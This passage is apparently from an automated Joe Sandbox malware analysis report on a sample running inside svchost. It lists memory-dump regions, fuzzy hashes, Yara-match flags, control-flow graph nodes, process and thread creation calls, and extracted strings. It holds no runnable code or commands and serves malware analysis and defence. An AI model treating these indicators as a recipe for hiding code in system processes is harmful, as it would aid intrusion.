                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 658390109daa7272b6d252a106a63f1ec800042c1589717b036c1192c10602ac
                                                                        • Instruction ID: 8578209f691f6f6d3f36360c5e96c9e92a940fe244bfb2d04a34e426fd988201
                                                                        • Opcode Fuzzy Hash: 658390109daa7272b6d252a106a63f1ec800042c1589717b036c1192c10602ac
                                                                        • Instruction Fuzzy Hash: 6B900221211C0442D200B6684C54B4B0006C7E0303F95C116A0154958CCB1589615525
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c5893831817649cb1e1e44d0510f1dc0d2af392abf5f640d6a28f0f95e01da98
                                                                        • Instruction ID: 1b8e297135e053990b57d6a5726b469420328d6dd36b46e306be3dfe52296c16
                                                                        • Opcode Fuzzy Hash: c5893831817649cb1e1e44d0510f1dc0d2af392abf5f640d6a28f0f95e01da98
                                                                        • Instruction Fuzzy Hash: 97900221601404424140B268888494A4006EBF1311795C122A0998954D875989655669
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5e93a703c7f5f54fc9e144388878dbb1c25cbcaf6e3f42b7074de15c1c7a85be
                                                                        • Instruction ID: dfe9b4d20b83632294945e48237db2af787c42e5f342c93c6f8b94d8409d2823
                                                                        • Opcode Fuzzy Hash: 5e93a703c7f5f54fc9e144388878dbb1c25cbcaf6e3f42b7074de15c1c7a85be
                                                                        • Instruction Fuzzy Hash: DF90026120180803D140B658484464B0006C7E0302F95C012A2064959E8B298D516139
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5ad20d37507022d2f2273f13ea7a713b5c9947c9313c6518467cc18144a7028d
                                                                        • Instruction ID: 5b2508f1a83d2d699049f6d0716aa297cdb4ef6126c4b29bee7b16b2be661737
                                                                        • Opcode Fuzzy Hash: 5ad20d37507022d2f2273f13ea7a713b5c9947c9313c6518467cc18144a7028d
                                                                        • Instruction Fuzzy Hash: C390022160140902D101B258444465A000BC7E0341FD5C023A1024959ECB258A92A135
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a54b2899dfc8ca35ca12bdcca9794f85d5d64e0c25401c02d4e9d8d88d6ee4f3
                                                                        • Instruction ID: ffc033f7e1f6c6890b4aac20874f2776d581f4be96ba09313c4e47e33bd37ac5
                                                                        • Opcode Fuzzy Hash: a54b2899dfc8ca35ca12bdcca9794f85d5d64e0c25401c02d4e9d8d88d6ee4f3
                                                                        • Instruction Fuzzy Hash: D790022921340402D180B258544864E0006C7E1302FD5D416A001595CCCB1589695325
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f2c96e209ac0d30abacb3cdfe97c92a9a03af4fdca27059db6f32e8a6a1893c8
                                                                        • Instruction ID: 3e068da38f2575aa266daf77abc10c18cfa6c1e4e4eb60675e31b78fc05b6fb4
                                                                        • Opcode Fuzzy Hash: f2c96e209ac0d30abacb3cdfe97c92a9a03af4fdca27059db6f32e8a6a1893c8
                                                                        • Instruction Fuzzy Hash: E690022130140403D140B258545864A4006D7F1301F95D012E0414958CDB1589565226
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 9c92a54f9a4b905a300c94c250f8182f472e4bfe2beb934851d46e0a235b45dd
                                                                        • Instruction ID: 59f5aeeb119ec5e2b9127aed687eddae7065d09bc08c4bfc827971450e953640
                                                                        • Opcode Fuzzy Hash: 9c92a54f9a4b905a300c94c250f8182f472e4bfe2beb934851d46e0a235b45dd
                                                                        • Instruction Fuzzy Hash: 60900221242445525545F258444454B4007D7F03417D5C013A1414D54C87269956D625
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 46977b51b773d13d9b7de835fdf2022ba2715e9f56745a477666e3357d74669c
                                                                        • Instruction ID: a81098e5722d36f428ef954467ae2455a47630f9ac59229d58944769b4d7c5f7
                                                                        • Opcode Fuzzy Hash: 46977b51b773d13d9b7de835fdf2022ba2715e9f56745a477666e3357d74669c
                                                                        • Instruction Fuzzy Hash: A890023120140813D111B258454474B000AC7E0341FD5C413A042495CD97568A52A125
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c1515ba76762767aee053f2ff061a1d560423c64ed3c9c577a0706a4e807a2e5
                                                                        • Instruction ID: bac37f058a9e44e3df3b834c4ea919e15cc8c498e56e899edf1770c556259564
                                                                        • Opcode Fuzzy Hash: c1515ba76762767aee053f2ff061a1d560423c64ed3c9c577a0706a4e807a2e5
                                                                        • Instruction Fuzzy Hash: DA90023120140C42D100B2584444B8A0006C7F0301F95C017A0124A58D8715C9517525
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f2b091017c9f28c8a900117e2b27d45c1c94003280a1e4a53f373666f3404167
                                                                        • Instruction ID: b67a08933cf5a815060eef9f3b48562ffb39c8f438640fc5365241e215c9c810
                                                                        • Opcode Fuzzy Hash: f2b091017c9f28c8a900117e2b27d45c1c94003280a1e4a53f373666f3404167
                                                                        • Instruction Fuzzy Hash: 5F90023120148C02D110B258844478E0006C7E0301F99C412A4424A5CD879589917125
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 37e6147fe09257f3122507df560be3285eef27172d5cc52c7f670308aa226da7
                                                                        • Instruction ID: 946a263a7d4d4efd4ba6c07d996a6645221cdf0dd07269b2c62c99fa2a5343fa
                                                                        • Opcode Fuzzy Hash: 37e6147fe09257f3122507df560be3285eef27172d5cc52c7f670308aa226da7
                                                                        • Instruction Fuzzy Hash: 4790023120140802D100B698544868A0006C7F0301F95D012A5024959EC76589916135

                                                                        Control-flow Graph (rendered graph not captured; nodes and edges recovered from the graph data)
                                                                        • Node 479: 760df5-760df6
                                                                        • Node 480: 760e1b-760e6a, calls 77c070, 7645c0, 751470, 771d10
                                                                        • Node 481: 760df8-760e1a, calls 77b660
                                                                        • Node 492: 760e6c-760e7b, calls PostThreadMessageW
                                                                        • Node 493: 760e8a-760e90
                                                                        • Node 494: 760e7d-760e87
                                                                        • Edges: 479->480, 479->481, 481->480, 480->492, 480->493, 492->493, 492->494, 494->493
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(72945936,00000111,00000000,00000000), ref: 00760E77
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 72945936$72945936
                                                                        • API String ID: 1836367815-646505885
                                                                        • Opcode ID: b7b66841ccd1dcc359b4dde223a7a3e365c346da850d1c2025f1f3d85d26986e
                                                                        • Instruction ID: 5e3c27d8021778cb07079957288cf99a6a72568c71f608b9e609c3e760f6212a
                                                                        • Opcode Fuzzy Hash: b7b66841ccd1dcc359b4dde223a7a3e365c346da850d1c2025f1f3d85d26986e
                                                                        • Instruction Fuzzy Hash: 681138B1C0114CBAEF01AAA08C81EEF7BBCEB05798F448164FA04A3241E5395D068BE1

                                                                        Control-flow Graph (rendered graph not captured; nodes and edges recovered from the graph data)
                                                                        • Node 495: 760e00-760e12
                                                                        • Node 496: 760e1a-760e6a, calls 77c070, 7645c0, 751470, 771d10
                                                                        • Node 497: 760e15, calls 77b660
                                                                        • Node 507: 760e6c-760e7b, calls PostThreadMessageW
                                                                        • Node 508: 760e8a-760e90
                                                                        • Node 509: 760e7d-760e87
                                                                        • Edges: 495->496, 495->497, 497->496, 496->507, 496->508, 507->508, 507->509, 509->508
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(72945936,00000111,00000000,00000000), ref: 00760E77
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 72945936$72945936
                                                                        • API String ID: 1836367815-646505885
                                                                        • Opcode ID: dbe5725f5941867727f6a4ce5034651299952f64859f0e0394aac61bf8557a0f
                                                                        • Instruction ID: 63ecda0ff44f6ca49bfe74d2e213c9c513b6b55d58195c032b7d86a8a8c4da23
                                                                        • Opcode Fuzzy Hash: dbe5725f5941867727f6a4ce5034651299952f64859f0e0394aac61bf8557a0f
                                                                        • Instruction Fuzzy Hash: 6901C4B1D0115CBAEB11AAE48C82EEF7B7CDF45794F058068FA04A7141E6685E068BF2
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeUninitialize
                                                                        • String ID: @J7<
                                                                        • API String ID: 3442037557-2016760708
                                                                        • Opcode ID: 6a2f5b9287dcb325afedf9cc9deb538138e8142e927f8e99eae6b10b421225ec
                                                                        • Instruction ID: 8c563651ae8a2932efd676ad34158ae90f2180b8c7ac652d459873cd0ba996e3
                                                                        • Opcode Fuzzy Hash: 6a2f5b9287dcb325afedf9cc9deb538138e8142e927f8e99eae6b10b421225ec
                                                                        • Instruction Fuzzy Hash: 383123B5A0060AAFDB10DFD8D8809EEB7B9FF88314B108559E915A7214D775AE05CBA0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeUninitialize
                                                                        • String ID: @J7<
                                                                        • API String ID: 3442037557-2016760708
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00773C2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: wininet.dll
                                                                        • API String ID: 3472027048-3354682871
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00764632
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,007683AE,00000010,00000000,?,?,00000044,00000000,00000010,007683AE,?,?,00000000), ref: 00779960
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759E95
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759E95
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C1F85D8B,00000007,00000000,00000004,00000000,00763E3D,000000F4), ref: 007798AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00761A89,?,?,00761A89,?Ww,?,?,00761A89,?Ww,00001000,?,?,00000000), ref: 0077985C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0076841C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0076841C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00761D90,0077807F,?Ww,00761D56), ref: 00768213
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00761D90,0077807F,?Ww,00761D56), ref: 00768213
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        Strings
                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 034A4725
                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 034A4655
                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 034A4742
                                                                        • ExecuteOptions, xrefs: 034A46A0
                                                                        • Execute=1, xrefs: 034A4713
                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034A46FC
                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 034A4787
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                        • API String ID: 0-484625025
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-$0$0
                                                                        • API String ID: 1302938615-699404926
                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction ID: 190be8e3f855835c29307f5b229531a12148b597511bb2a7c84519a7f6e38254
                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction Fuzzy Hash: 6E81BF74E052499EDF24CE68C8917FEBBB6EF45320F1C425BD861AF390C73498418B69
                                                                        Strings
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034A02E7
                                                                        • RTL: Re-Waiting, xrefs: 034A031E
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034A02BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                        • API String ID: 0-2474120054
                                                                        • Opcode ID: 38d9de2bd5d68b9d22f3905dcbaf2d0b2a99242a0acd0263f59817186a547686
